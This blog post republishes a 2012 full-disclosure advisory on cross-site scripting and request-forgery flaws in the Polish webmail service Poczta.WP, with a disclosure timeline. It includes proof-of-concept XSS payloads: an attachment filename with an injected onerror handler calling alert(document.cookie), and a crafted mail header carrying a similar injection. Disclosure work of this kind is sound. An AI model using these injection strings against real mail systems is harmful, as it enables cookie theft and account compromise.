czwartek, 6 grudnia 2012

[Full Disclosure] Poczta.WP Multiple vulnerabilities


Poczta.WP Multiple vulnerabilities full disclosure

Author: Jakub Zoczek [zoczus(x)]

0x01 Intro

Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service ( is affected by multiple cross-site
scripting vulnerabilities and also one, almost fixed cross-site
request forgery bug. After long time of waiting - I got a
non-professional answer from Customer Service Manager of WP, so I
decided to post all my research here. Thus...

0x02 XSS in mail attachments.
Reported: 10/10/2012
State: Fixed

Proof Of Concept:

For example - jpeg picture with filename:

sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg

..sent as e-mail attachment.


0x03 XSRF in AntyHack and AntySpam fitler (adding to white list)

Reported: 24/11/2012
State: "Fixed"

Proof Of Concept:


0x04 XSRF in AntyHack and AntySpam fitler - bypassing 'fix' ;) Reported: 04/12/2012 State: Not fixed Proof Of Concept: Additional info for 0x03 - as I supposed, WP used the token in a white list form (every once in a while generated md5 of something). The problem is, that the token value is probably the same for each user. For different mail accounts, different browsers, different IP addresses - token is the same... Bypassing this protection seems to be quite simple.
0x05 XSS in mail headers Reported: 04/12/2012 State: Not fixed Proof Of Concept: Return-Path: <zoczus () fbi pl> Delivered-To: zoczus () wp pl (zoczus) Received: (wp-smtpd 10088 invoked from network); 30 Nov 2012 16:04:58 +0100 Received: from ([]) (envelope-sender <zoczus () fbi pl>) by (WP-SMTPD) with SMTP for <zoczus () wp pl>; 30 Nov 2012 16:04:58 +0100 Received: by (Postfix, from userid 33) id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET) To: zoczus () wp pl Subject: From: "zoczus () fbi pl" <zoczus () fbi pl> Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces X-Priority: 3 (Normal) Importance: Normal Errors-To: zoczus () fbi pl Reply-To: zoczus () fbi pl Content-Type: text/plain; charset=utf-8 Message-Id: <20121130150457.D4119D5807 () emkei cz> Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET) X-WP-DKIM-Status: no signature (id: n/a) X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A. X-WP-SPAM: NO (UW) 0000010 [8Wph] Dobre! Result:

0x06 The end. :)

Powyższe błędy zostały poprawione błyskawicznie po publikacji raportu. 

Brak komentarzy:

Prześlij komentarz